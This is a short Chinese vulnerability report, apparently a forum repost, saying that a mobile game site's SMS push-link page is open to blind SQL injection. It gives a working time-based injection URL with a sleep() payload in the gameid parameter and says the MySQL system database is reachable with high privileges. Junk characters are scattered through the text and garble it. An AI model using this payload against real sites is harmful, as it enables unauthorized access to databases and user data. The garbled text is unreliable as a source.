简要描述:
3 f2 j+ g7 s) t/ G, K, ^( {凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
# l1 t$ @) g' l2 f2 z
; H# c7 {0 t6 d8 K详细说明:
+ y3 {; O, Y8 P4 P8 }4 A6 |% t4 U存在SQL盲注url:' z; s6 H# w1 F9 ]* _" M0 P# {
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
) S% b9 Z7 C5 ?, _3 {http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png" Q8 |" Q' u% H/ N& a' n! q% T( ^
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
4 Q7 X+ P5 B7 g& ~4 B+ qhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
8 r* M; d! c, ]6 q0 T4 P% Y" C& A& p, t3 Q3 u8 o6 R6 N, g
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对